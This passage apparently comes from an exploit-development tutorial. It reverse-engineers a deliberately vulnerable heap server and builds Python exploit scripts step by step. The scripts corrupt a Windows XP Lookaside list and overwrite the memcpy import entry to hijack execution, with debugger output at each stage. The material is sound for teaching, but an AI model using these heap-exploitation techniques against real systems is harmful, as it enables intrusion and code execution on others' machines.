    .text:004022A5 mov     eax, [ebp+tmpbuf2]
    .text:004022AB movzx   eax, al
    .text:004022AE mov     [esp+5A8h+param2], eax ; Val
    .text:004022B2 mov     eax, [ebp+tempoffset]
    .text:004022B8 add     eax, [ebp+tempbuf]
    .text:004022BE mov     [esp+5A8h+param1], eax ; Dst
    .text:004022C1 call    _memset
    .text:004022C6 lea     eax, [ebp+offset]
    .text:004022CC add     dword ptr [eax], 2
    .text:004022CF lea     eax, [ebp+tempoffset]
    .text:004022D5 inc     dword ptr [eax]
    .text:004022D7 jmp     loc_402231
    

    The above code block essentially takes two characters like "AB" and converts them to their base-16 equivalent 0xAB. It makes sense why the allocated tempbuf is exactly half the size of the buf1: every two bytes in buf1 are converted to their single byte hexadecimal equivalents.

    After populating the tempbuf, the temporary buffer is passed to Function4 for processing:

    .text:004022DC loc_4022DC:
    .text:004022DC mov     eax, [ebp+tempbuf]
    .text:004022E2 mov     [esp+5A8h+param1], eax ; argstr
    .text:004022E5 call    _Function4
    .text:004022EA mov     [esp+5A8h+param3], 2048 ; Size
    .text:004022F2 mov     [esp+5A8h+param2], 0 ; Val
    .text:004022FA mov     eax, [ebp+tempbuf]
    .text:00402300 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402303 call    _memset
    .text:00402308 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402310 mov     [esp+5A8h+param3], 12h ; len
    .text:00402318 mov     [esp+5A8h+param2], offset aHterRunningFin ; "HTER RUNNING FINE\n"
    .text:00402320 mov     eax, [ebp+socket]
    .text:00402326 mov     [esp+5A8h+param1], eax ; s
    .text:00402329 call    _send@16        ; send(x,x,x,x)
    .text:0040232E sub     esp, 10h
    .text:00402331 mov     [ebp+var_414], eax
    .text:00402337 jmp     loc_40258A
    

    Remarks: The command may come in handy due to both the sheer size of the allocated buffer as well as a possible call to Function4.

    LTER

    If you found HTER functionality interesting, the LTER command makes even stranger manipulations to the received buffer. The code block begins by allocating a 4096 byte temporary buffer on the default heap and initializing it to all zeroes:

    .text:0040235F mov     [esp+5A8h+param1], 4096 ; Size
    .text:00402366 call    _malloc
    .text:0040236B mov     [ebp+tmpbuf2], eax
    .text:00402371 mov     [esp+5A8h+param3], 4096 ; Size
    .text:00402379 mov     [esp+5A8h+param2], 0 ; Val
    .text:00402381 mov     eax, [ebp+tmpbuf2]
    .text:00402387 mov     [esp+5A8h+param1], eax ; Dst
    .text:0040238A call    _memset
    .text:0040238F mov     [ebp+offset], 0
    

    Next, it enters a loop which continues until a null byte is encountered:

    .text:00402399 loc_402399:
    .text:00402399 mov     eax, [ebp+buf1]
    .text:0040239C add     eax, [ebp+offset]
    .text:004023A2 cmp     byte ptr [eax], 0
    .text:004023A5 jz      short loc_4023FB
      :
      :
    .text:004023F1 loc_4023F1:
    .text:004023F1 lea     eax, [ebp+offset]
    .text:004023F7 inc     dword ptr [eax]
    .text:004023F9 jmp     short loc_402399
    

    While iterating through the loop, the current byte is also checked to be unsigned:

    .text:004023A7 mov     eax, [ebp+buf1]
    .text:004023AA add     eax, [ebp+offset]
    .text:004023B0 cmp     byte ptr [eax], 0
    .text:004023B3 jns     short loc_4023D5 ; check the result is not signed
    .text:004023B3                          ; (MSB not set)
    

    This operation essentially makes sure that the most significant bit of the current byte is not set. This essentially limits valid byte values to 0x01 - 0x7F. The value 0x7F also happens to be the highest valid character in the ASCII table. If the byte is within proper bounds, it is simply stored at the current offset in the tmpbuf2 buffer:

    .text:004023D5 loc_4023D5:
    .text:004023D5 mov     eax, [ebp+tmpbuf2]
    .text:004023DB mov     edx, [ebp+offset]
    .text:004023E1 add     edx, eax
    .text:004023E3 mov     eax, [ebp+buf1]
    .text:004023E6 add     eax, [ebp+offset]
    .text:004023EC movzx   eax, byte ptr [eax]
    .text:004023EF mov     [edx], al
    

    Alternatively, the byte is adjusted by subtracting 0x7F from it before storing it in the tmpbuf2:

    .text:004023B5 mov     eax, [ebp+tmpbuf2]
    .text:004023BB mov     edx, [ebp+offset]
    .text:004023C1 add     edx, eax
    .text:004023C3 mov     eax, [ebp+buf1]
    .text:004023C6 add     eax, [ebp+offset]
    .text:004023CC movzx   eax, byte ptr [eax]
    .text:004023CF sub     al, 7Fh
    .text:004023D1 mov     [edx], al
    .text:004023D3 jmp     short loc_4023F1
    

    After populating the temporary buffer, LTER enters another loop starting at the offset following the actual command string:

    .text:004023FB loc_4023FB:
    .text:004023FB mov     [ebp+offset], 5
    .text:00402405 loc_402405:
    .text:00402405 cmp     [ebp+offset], 4095
    .text:0040240F jg      short loc_40243C
      :
      :
    .text:00402432 loc_402432:
    .text:00402432 lea     eax, [ebp+offset]
    .text:00402438 inc     dword ptr [eax]
    .text:0040243A jmp     short loc_402405
    

    In the second loop a check is performed on whether or not the current byte is the '.' character. If this condition is satisfied, then the loop is terminated early and the Function3 is called with the entire tmpbuf2 as the first parameter:

    .text:00402411 mov     eax, [ebp+tmpbuf2]
    .text:00402417 add     eax, [ebp+offset]
    .text:0040241D cmp     byte ptr [eax], '.'
    .text:00402420 jnz     short loc_402432
    .text:00402422 mov     eax, [ebp+tmpbuf2]
    .text:00402428 mov     [esp+5A8h+param1], eax ; buf
    .text:0040242B call    _Function3
    .text:00402430 jmp     short loc_40243C
    

    Finally, regardless of the reason for loop termination, the temporary buffer is zeroed out and a confirmation message is sent to the user:

    .text:0040243C loc_40243C:             ; Size
    .text:0040243C mov     [esp+5A8h+param3], 4096
    .text:00402444 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040244C mov     eax, [ebp+tmpbuf2]
    .text:00402452 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402455 call    _memset
    .text:0040245A mov     [esp+5A8h+param4], 0 ; flags
    .text:00402462 mov     [esp+5A8h+param3], 0Eh ; len
    .text:0040246A mov     [esp+5A8h+param2], offset aLterComplete ; "LTER COMPLETE\n"
    .text:00402472 mov     eax, [ebp+socket]
    .text:00402478 mov     [esp+5A8h+param1], eax ; s
    .text:0040247B call    _send@16        ; send(x,x,x,x)
    .text:00402480 sub     esp, 10h
    .text:00402483 mov     [ebp+var_414], eax
    .text:00402489 jmp     loc_40258A
    

    Remarks: The command is interesting due to large allocated space; however, its use may be limited due to character range limitation. If used to store shellcode, the shellcode must be ASCII-encoded. It may come in handy due to the call to Function3.

    KSTAN

    The KSTAN command is limited to displaying a predefined string without any user input processing:

    .text:004024AD mov     [esp+5A8h+param4], 0 ; flags
    .text:004024B5 mov     [esp+5A8h+param3], 0Fh ; len
    .text:004024BD mov     [esp+5A8h+param2], offset aKstanUnderway ; "KSTAN UNDERWAY\n"
    .text:004024C5 mov     eax, [ebp+socket]
    .text:004024CB mov     [esp+5A8h+param1], eax ; s
    .text:004024CE call    _send@16        ; send(x,x,x,x)
    .text:004024D3 sub     esp, 10h
    .text:004024D6 mov     [ebp+var_414], eax
    .text:004024DC jmp     loc_40258A
    

    Remarks: The command does not do anything interesting.

    EXIT

    The EXIT command does exactly what its name implies. It announces connection termination and closes the connection socket:

    .text:00402500 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402508 mov     [esp+5A8h+param3], 8 ; len
    .text:00402510 mov     [esp+5A8h+param2], offset aGoodbye ; "GOODBYE\n"
    .text:00402518 mov     eax, [ebp+socket]
    .text:0040251E mov     [esp+5A8h+param1], eax ; s
    .text:00402521 call    _send@16        ; send(x,x,x,x)
    .text:00402526 sub     esp, 10h
    .text:00402529 mov     [ebp+var_414], eax
    .text:0040252F mov     [esp+5A8h+param1], offset aConnectionClos ; "Connection closing...\n"
    .text:00402536 call    _printf
    .text:0040253B mov     eax, [ebp+socket]
    .text:00402541 mov     [esp+5A8h+param1], eax ; s
    .text:00402544 call    _closesocket@4  ; closesocket(x)
    .text:00402549 sub     esp, 4
    .text:0040254C mov     [ebp+param5], 0
    .text:00402556 jmp     loc_40262D
    

    Remarks: The command may be useful to terminate the thread.

    UNKNOWN COMMAND

    The default command handler, where none of the aforementioned commands matched, simply announces the provided command is not known and loops back to receive another user request:

    .text:0040255B mov     [esp+5A8h+param4], 0
    .text:00402563 mov     [esp+5A8h+param3], 10h ; len
    .text:0040256B mov     [esp+5A8h+param2], offset aUnknownCommand ; "UNKNOWN COMMAND\n"
    .text:00402573 mov     eax, [ebp+socket]
    .text:00402579 mov     [esp+5A8h+param1], eax ; s
    .text:0040257C call    _send@16        ; send(x,x,x,x)
    .text:00402581 sub     esp, 10h
    .text:00402584 mov     [ebp+var_414], eax
    ; ---------------------------------------------------------------------------
    .text:0040258A loc_40258A:
    .text:0040258A cmp     [ebp+var_414], 0FFFFFFFFh
    .text:00402591 jnz     loc_401A74
    

    Remarks: The command does not do anything useful.

    Function X

    Now that we have analyzed all of the server commands, let's look at the four mystery Function X calls:

    Function 1

    The first function tokenizes the provided buffer using the ' ' character and copies the second token to the global variable a:

    .text:004017B3 mov     [esp+18h+param2], offset Delim ; " "
    .text:004017BB mov     eax, [ebp+arg_0]
    .text:004017BE mov     [esp+18h+param1], eax ; Str
    .text:004017C1 call    _strtok         ; get first token
    .text:004017C6 mov     [ebp+token], eax
    .text:004017C9 mov     [esp+18h+param2], offset Delim ; " "
    .text:004017D1 mov     [esp+18h+param1], 0 ; Str
    .text:004017D8 call    _strtok         ; get second token
    .text:004017DD mov     [ebp+token], eax
    .text:004017E0 mov     eax, [ebp+token]
    .text:004017E3 mov     [esp+18h+param2], eax ; Source
    .text:004017E7 mov     eax, ds:_a
    .text:004017EC mov     [esp+18h+param1], eax ; Dest
    .text:004017EF call    _strcpy         ; copy second token into a global var - a
    

    Remarks: The unsafe strcpy function may be used to overflow the buffer pointed to by the global variable a.

    Function 2

    Just like the one before it, the second function extracts the second token from the provided buffer using the ' ' character as the separator. However, instead of copying the value to the variable a, the length of the second token is used to allocate a heap chunk of the same size:

    .text:004017FC mov     [esp+18h+param2], offset Delim ; " "
    .text:00401804 mov     eax, [ebp+arg_0]
    .text:00401807 mov     [esp+18h+param1], eax ; Str
    .text:0040180A call    _strtok         ; get first token
    .text:0040180F mov     [ebp+token], eax
    .text:00401812 mov     [esp+18h+param2], offset Delim ; " "
    .text:0040181A mov     [esp+18h+param1], 0 ; Str
    .text:00401821 call    _strtok         ; get second token
    .text:00401826 mov     [ebp+token], eax
    .text:00401829 mov     eax, [ebp+token]
    .text:0040182C mov     [esp+18h+param1], eax ; Str
    .text:0040182F call    _strlen         ; second token length
    .text:00401834 mov     ds:_bufferlen, eax
    .text:00401839 mov     eax, ds:_bufferlen
    .text:0040183E mov     [esp+18h+param3], eax ; dwBytes
    .text:00401842 mov     [esp+18h+param2], 8 ; dwFlags
    .text:0040184A mov     eax, ds:_hHeap
    .text:0040184F mov     [esp+18h+param1], eax ; hHeap
    .text:00401852 call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:00401857 sub     esp, 0Ch
    .text:0040185A mov     ds:_a, eax      ; a = HeapAlloc(token_len)
    

    Notice the use of the HeapAlloc call along with the private heap hHeap that we have created earlier.

    Remarks: By varying the size of the second token, we could make the application allocate arbitrary sized heap chunks.

    Function 3

    Following the established pattern, the third function begins by splitting up the string into tokens and obtaining the length of the second token:

    .text:00401867 mov     [esp+18h+param2], offset Delim ; " "
    .text:0040186F mov     eax, [ebp+arg_0]
    .text:00401872 mov     [esp+18h+param1], eax ; Str
    .text:00401875 call    _strtok         ; get first token
    .text:0040187A mov     [ebp+token], eax
    .text:0040187D mov     [esp+18h+param2], offset Delim ; " "
    .text:00401885 mov     [esp+18h+param1], 0 ; Str
    .text:0040188C call    _strtok         ; get second token
    .text:00401891 mov     [ebp+token], eax
    .text:00401894 mov     eax, [ebp+token]
    .text:00401897 mov     [esp+18h+param1], eax ; Str
    .text:0040189A call    _strlen         ; second token length
    .text:0040189F mov     ds:_bufferlen, eax
    

    However, in this case the length is used to allocate and immediately free a chunk on the private application heap:

    .text:004018A4 mov     eax, ds:_bufferlen
    .text:004018A9 mov     [esp+18h+param3], eax ; dwBytes
    .text:004018AD mov     [esp+18h+param2], 8 ; dwFlags
    .text:004018B5 mov     eax, ds:_hHeap
    .text:004018BA mov     [esp+18h+param1], eax ; hHeap
    .text:004018BD call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:004018C2 sub     esp, 0Ch
    .text:004018C5 mov     ds:_b, eax      ; b = HeapAlloc(token_len)
    .text:004018CA mov     eax, ds:_b
    .text:004018CF mov     [esp+18h+param3], eax ; lpMem
    .text:004018D3 mov     [esp+18h+param2], 0 ; dwFlags
    .text:004018DB mov     eax, ds:_hHeap
    .text:004018E0 mov     [esp+18h+param1], eax ; hHeap
    .text:004018E3 call    _HeapFree@12    ; HeapFree(b)
    

    The pointer allocated heap chunk is stored in the global variable b.

    Remarks: The function may be used for a malloc/free primitive used in some heap exploitation scenarios.

    Function 4

    The last function in the series begins with the now familiar token and length routine:

    .text:004018F3 mov     [esp+18h+param2], offset Delim ; " "
    .text:004018FB mov     eax, [ebp+arg_0]
    .text:004018FE mov     [esp+18h+param1], eax ; Str
    .text:00401901 call    _strtok         ; get first token
    .text:00401906 mov     [ebp+token], eax
    .text:00401909 mov     [esp+18h+param2], offset Delim ; " "
    .text:00401911 mov     [esp+18h+param1], 0 ; Str
    .text:00401918 call    _strtok         ; get second token
    .text:0040191D mov     [ebp+token], eax
    .text:00401920 mov     eax, [ebp+token]
    .text:00401923 mov     [esp+18h+param1], eax ; Str
    .text:00401926 call    _strlen         ; second token length
    .text:0040192B mov     ds:_bufferlen, eax
    

    However, in this case two heap allocations are made using the token length as the heap chunk size parameter.

    .text:00401930 mov     eax, ds:_bufferlen
    .text:00401935 mov     [esp+18h+param3], eax ; dwBytes
    .text:00401939 mov     [esp+18h+param2], 8 ; dwFlags (HEAP_ZERO_MEMORY)
    .text:00401941 mov     eax, ds:_hHeap
    .text:00401946 mov     [esp+18h+param1], eax ; hHeap
    .text:00401949 call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:0040194E sub     esp, 0Ch
    .text:00401951 mov     ds:_b, eax      ; b = HeapAlloc(token_len)
    .text:00401956 mov     eax, ds:_bufferlen
    .text:0040195B mov     [esp+18h+param3], eax ; dwBytes
    .text:0040195F mov     [esp+18h+param2], 8 ; dwFlags
    .text:00401967 mov     eax, ds:_hHeap
    .text:0040196C mov     [esp+18h+param1], eax ; hHeap
    .text:0040196F call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:00401974 sub     esp, 0Ch
    .text:00401977 mov     ds:_c, eax      ; c = HeapAlloc(token_len)
    

    Also, the value of the second token is copied to the address pointed to by the global variable c (second allocation):

    .text:0040197C mov     eax, [ebp+token]
    .text:0040197F mov     [esp+18h+param2], eax ; Source
    .text:00401983 mov     eax, ds:_c
    .text:00401988 mov     [esp+18h+param1], eax ; Dest
    .text:0040198B call    _strcpy         ; copy second token to c
    

    While the application uses an unsafe function strcpy, an appropriately sized buffer is dynamically created to accommodate the input string.

    Remarks: The function may be used to allocate and populate arbitrary sized heap chunks on the private heap.

    Exploitation

    With a better understanding of application's functionality, let's review all the previously made remarks about potential vulnerabilities and devise a strategy on exploiting them.

    Vulnerability

    The call to strcpy in Function 1 is potentially vulnerable, because it copies an arbitrary sized user input to a fixed size buffer on the heap. The destination buffer is first allocated using the Function 2; however, the strcpy call occurs in a separate function call without any knowledge about the buffer size. As a result, if the user buffer in the Function 1 call is larger than the one used to allocate the buffer in the Function 2 call, then the application is indeed vulnerable to the heap overflow vulnerability and may be exploitable under certain conditions.

    Exploitation Strategy

    At this point we must decide on the exploitation strategy to turn the above heap overflow vulnerability into an arbitrary code execution.

    The target platform for the exploitation is Windows XP Service Pack 3, so the classic unlink() method is not going to work. However, the frontend allocator in this version of Windows uses a singly-linked Lookaside list which is lacking many of the security mechanisms such as safe unlinking and heap cookie checks. As described in great detail in Heap Overflows For Humans - 102, through careful manipulation of the heap, an attacker can cause a subsequent allocation to occur at an arbitrary address. As a result, it may be possible to overwrite the attacker controlled memory area with an arbitrary data.

    Below are the exact heap manipulations required to exploit the Lookaside list:

    1. Allocate chunk A.
    2. Allocate chunk B of the same size as chunk A.
    3. Free chunk B so that it is placed on the Lookaside list.
    4. Overflow chunk A into chunk B to overwrite chunk B's flink pointer with a target address to overwrite.
    5. Allocate chunk B again. This will cause corruption of the Lookaside's head flink pointer, so that the next allocation will return the target address.
    6. Allocate chunk C which will get the target address.
    7. Write arbitrary data to the target address.

    Looking at the heap allocation and write primitives made available to us by Functions 1-4, we can trigger all of the above conditions and overwrite an arbitrary address with an arbitrary data as follows:

    1. Function 2 can be used to allocate a fixed size chunk A to satisfy Step 1.
    2. Function 3 can be used to allocated and immediately free chunk B with the same size as chunk A. This will satisfy Steps 2 and 3 as long as the Lookaside list for the particular size is empty and the chunk size is below 1016 bytes.
    3. Function 1 can be used to overflow chunk A and overwrite the flink pointer in the recently freed chunk B. This operation will satisfy Step 4.
    4. Function 4 can be used to allocate chunk B again resulting in corrupted Lookaside header for the particular size. Also, the same function will allocate chunk C and fill it with the supplied user data. The Function 4 can be used to satisfy Steps 5, 6, and 7.

    The next part of the strategy is deciding which of the commands supported by the server can be used to trigger all four functions in that order. Based on the reverse engineering session above we can build a map of which commands result in function executions:

    • Function 1 is called by GTER command.
    • Function 2 is called by KSET command.
    • Function 3 is called by TRUN, GMON, and LTER commands.
    • Function 4 is called by STATS and HTER commands.

    We don't have much choice regarding the first two functions; however, I have decided to use GMON and STATS to call Function 3 and Function 4 respectively due to their relative simplicity compared to the others.

    Smashing Lookaside

    Let's begin developing the exploit by crafting a simple connection script:

    #!/usr/bin/env python
    import sys, socket
    from struct import pack
    from binascii import hexlify
    
    HOST = sys.argv[1]
    PORT = 9999
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    
    print "%s" % s.recv(1024)
    
    s.sendall("EXIT")
    print "%s" % s.recv(1024)
    
    s.close()
    

    The script will simply connect to the server and issue a single EXIT command, here is the output:

    Welcome to Heap Vulnerable Server! Enter HELP for h
    GOODBYE
    

    Now, let's allocate chunk A with the GTER command and allocatate/free chunk B with the KSET command with the following payload:

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    

    By crafting two 8 byte parameters for the KSTET and GMON commands, the functions Function 2 and Function 3 will parse them as the second token and use their size to allocate and free respective chunks. The above will allocate two minimum size 8 byte chunks (16 bytes really including the 8 byte header) on the heap. Also, as long as there were no other deallocations on the heap of the same size, chunk B will be placed into Lookaside[2] as a result of the HeapFree.

    Let's observe heap behavior in the debugger. I will use the Immunity Debugger for the application debugging with the Heaper plugin for heap analysis. Be sure to run !hidedebug all_debug or an equivalent so that the application will use the Lookaside list.

    Run the application in the Immunity Debugger with breakpoints at at 0x004020A6 (call to Function 2 from KSTET) and 0x00401F85 (call to Function 3 from GMON). At the time the first breakpoint is triggered the application will contain several heaps:

    >!heaper dumpheaps
    
    ----------------------------------------
        __
       / /  ___ ___ ____  ___ ____
      / _ \/ -_) _ `/ _ \/ -_) __/
     /_//_/\__/\_,_/ .__/\__/_/
                  /_/
    ----------------------------------------
    by mr_me :: steventhomasseeley@gmail.com
    ------------------------
    Listing available heaps:
    
    Heap: 0x00250000
    Heap: 0x00350000
    Heap: 0x00360000
    Heap: 0x00030000
    Heap: 0x00490000
    ----------------
    

    The heap at 0x00490000 is the private heap obtained by the HeapCreate() call in the main function. Let's look at the heap structure:

    >!heaper analyzeheap 490000
    
    --------------------------------------------------
    Heap structure @ 0x00490000
    --------------------------------------------------
    +0x000 Entry                          : 0x00490000
    +0x008 Signature                      : 0xeeffeeff
    +0x00c Flags                          : 0x00041002
    +0x010 Forceflags                     : 0x00000000
    +0x014 VirtualMemoryThreshold         : 0x0000fe00
    +0x018 SegmentReserve                 : 0x00100000
    +0x01C SegmentCommit                  : 0x00002000
    +0x020 DeCommitFreeBlockThreshold     : 0x00000200
    +0x024 DeCommitTotalBlockThreshold    : 0x00002000
    +0x028 TotalFreeSize                  : 0x0000022f
    +0x02c MaximumAllocationSize          : 0x7ffdefff
    +0x030 ProcessHeapsListIndex          : 0x00000005
    +0x032 HeaderValidateLength           : 0x00000608
    +0x034 HeaderValidateCopy             : 0x00000000
    +0x038 NextAvailableTagIndex          : 0x00000000
    +0x03a MaximumTagIndex                : 0x00000000
    +0x03c TagEntries                     : 0x00000000
    +0x040 UCRSegments                    : 0x00000000
    +0x044 UnusedUncommittedRanges        : 0x00490598
    +0x048 AlignRound                     : 0x0000000f
    +0x04c AlignMask                      : 0xfffffff8
    +0x050 VirtualAllocedBlocks
           VirtualAllocedBlock 1          : 0x00490050
           VirtualAllocedBlock 2          : 0x00490050
    +0x058 Segments
           Segment 1                      : 0x00490000
    +0x158 FreelistBitmap                 : 0x00000000
    +0x16a AllocatorBackTraceIndex        : 0x00000000
    +0x16c NonDedicatedListLength         : 0x00000001
    +0x170 LargeBlocksIndex               : 0x00000000
    +0x174 PseudoTagEntries               : 0x00000000
    +0x178 Freelist[0]                    : 0x00490178
    +0x578 LockVariable                   : 0x00490608
    +0x57c CommitRoutine                  : 0x00000000
    +0x580 FrontEndHeap                   : 0x00490688
    +0x584 FrontHeapLockCount             : 0x00000000
    +0x586 FrontEndHeapType               : 0x00000001
    +0x587 LastSegmentIndex               : 0x00000000
    --------------------------------------------------
    

    Notice the value of the FrontEndHeap points to +0x688 indicating that the Lookaside heap is used by the application.

    Back to the debugger, step over the call to Function 2 at 0x004020A6 and observe the state of the heap:

    >!heaper analysechunks 490000 -f  busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    

    Notice the very last 16 byte BUSY chunk, this is the chunk A we have just allocated.

    Continue executing in the debugger step over the call to Function 3 at 0x00401f85:

    >!heaper analysechunks 490000 -f  busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) Chunk on the Lookaside @ 0x00491e98
        -> Lookaside[0x02] entry
            -> Flink: 0x00491ea0
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00000010 (0002)
        -> flags: 0x0001 (B$)
    --------------------------------------------------------------
    

    Just as was expected the original allocated chunk A at 0x00491e88 remains busy while chunk B was included in the Lookaside[2] with the Flink pointing to 0x00491ea0.

    At this point let's overflow chunk A with the GTER command and overwrite chunk B's flink with a value we control using the payload below:

    # 1) Allocate Chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free Chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow Chunk A and overwrite Chunk B flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "CCCC")
    print "%s" % s.recv(1024)
    

    As a result of the GTER command above, chunk B's flink should be overwritten with 43434343. Let's confirm it in the debugger by setting a breakpoint at the call to Function 1 at 0x00402173. Once you reach that point step over it and observe the heap:

    >!heaper analysefrontend 490000 -l
    
    ---------------------------------------------------------
    Lookaside List structure @ 0x00490688
    ---------------------------------------------------------
    Lookaside[0x02] - No. of chunks: 1, ListEntry: 0x004906e8, Size: 0x18 (16+8=24)
    
        ****************************************************************************************************
        chunk (1): 0x00491e98, flink: 0x43434343, size: 16962 (0x4242), cookie: 0x42 <= size/chunk corruption detected!
        ****************************************************************************************************
        ********************************************************************************************
        chunk (2): 0x4343433b, flink: 0x00000000, size: 0 (0x00), cookie: 0x0 <= fake chunk created!
        ********************************************************************************************
    
    --------------------------------------------------------------------------------
    

    The Lookaside[2] list was corrupted with the chunk B node pointing to a fake address 0x43434343.

    Now as a final touch let's allocate chunk B again in order to corrupt the Lookaside[2] header followed by another allocation to overwrite the target address with an arbitrary value.

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "CCCC")
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + "DDDD")
    print "%s" % s.recv(1024)
    

    The above payload with use the STATS command to allocate two chunks and attempt to write DDDD to the address CCCC. Just as before, let's set a breakpoint at the point where Function 4 is called from the command STATS (address 0x00401C0E) and observe the execution from there.

    After the first call to HeapAlloc, the Lookaside[2] header will be corrupted with a pointer to 0x43434343:

    !heaper analysefrontend 490000 -l
    
    ---------------------------------------------------------
    Lookaside List structure @ 0x00490688
    ---------------------------------------------------------
    Lookaside[0x02] - No. of chunks: 0, ListEntry: 0x004906e8, Size: 0x18 (16+8=24)
    
        ********************************************************************************************
        chunk (1): 0x4343433b, flink: 0x00000000, size: 0 (0x00), cookie: 0x0 <= fake chunk created!
        ********************************************************************************************
    
    --------------------------------------------------------------------------------
    

    As a result, the second call to HeapAlloc to obtain same sized chunk will attempt to set chunk C to the address 0x43434343:

    As you can see from the above screenshot, the allocator crashes trying to read from a nonexistent chunk at 0x43434343. However, you can imagine (and we will confirm that shortly), a readable address in-place of 0x43434343 would successfully return an attacker provided address that would be used with the subsequent strcpy call in the Function 4.

    write4 Pointer

    With the ability to write to an arbitrary address, we must now decide which address to overwrite. Considering we are trying to gain arbitrary code execution, the target address must be not only writeable, but also be used as a pointer in a CALL or JMP instruction.

    The classic example of such a pointer is the RtlAcquirePEBLock() located in the PEB structure. Unfortunately, the location of the PEB structure is pseudo-randomized since XP SP2, so it would not make for a reliable exploit. Another frequently used pointer in write4 exploits is the one used by the WSACleanup() routine:

    However, I would rather avoid corrupting anything related to Windows sockets especially in an exploit where I would like to use a remote shellcode.

    NOTE: You can certainly fix up the overwritten value as part of the shellcode in case you really want to use this particular pointer.

    The approach I took for this particular exploit is to overwrite an IAT entry for the memcpy. The advantage of using this particular entry is that it can later be arbitrarily triggered with the HELP command, one of the few code blocks utilizing the function. The memcpy entry in the serve_heap application is located at 0x004061B0. You can locate the address of the memcpy entry in the IAT by reviewing the Imports subview in IDA or use one of the many PE file analysis tools.

    Let's update the previous payload to use the memcpy as a target address and overwrite it with 0x44444444:

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "\xb0\x06\x04\x00") # 0x004061b0 - memcpy
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + "DDDD")
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP")
    print "%s" % s.recv(1024)
    

    After overwriting the memcpy IAT entry and triggering it with the HELP command, the application will crash attempting to execute the address 0x44444444:

    Notice that we have used a 4 byte value "DDDD" as opposed to the usual 8 bytes used in prior allocations. This will still work, because the minimum chunk size is 8 bytes (+8 byte header), so any value less than 8 will still result in the allocation from the Lookaside[2]. This is useful when you need to overwrite precisely 4 bytes at some address without affecting any neighboring values.

    Great! With the ability to execute an arbitrary address in memory, we are now ready to inject the shellcode.

    Shellcode injection

    There are several locations where we could inject the shellcode; however, let's step up the challenge and assume that DEP is enabled. Recall the initial private heap initialization code segment:

    .text:004012C4 mov     [esp+298h+param3], 0 ; dwMaximumSize
